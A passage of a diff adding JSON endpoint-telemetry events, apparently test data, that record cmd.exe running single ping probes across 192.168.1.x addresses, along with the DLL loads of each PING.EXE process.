}, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237140000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237300000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237300000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572237300000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "event_type": "process", + "pid": 3380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572241830000, + "unique_pid": "{42FC7E13-CB67-5C05-0000-001011F65101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.54", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7688, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572242020000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572241980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "event_type": "process", + "pid": 7688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572246830000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-00107FF85101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.55", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3496, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572246980000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572246990000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "event_type": "process", + "pid": 3496, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572251830000, + "unique_pid": "{42FC7E13-CB68-5C05-0000-0010F9FA5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.56", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4796, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572251980000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572251990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572252140000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "event_type": "process", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572256840000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-00106CFD5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.57", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5216, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572256990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "event_type": "process", + "pid": 5216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572261990000, + "unique_pid": "{42FC7E13-CB69-5C05-0000-0010E7FF5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.58", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3184, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572262140000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "event_type": "process", + "pid": 3184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572266840000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-00103E045201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.59", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4692, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572266990000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4692, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572266980000, + "unique_pid": "{42FC7E13-CB6A-5C05-0000-0010B9065201}" + }, + { + "event_type": "registry", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475", + "registry_value": "418A073AA3BC3475", + "timestamp": 131883572268869984, + "unique_pid": 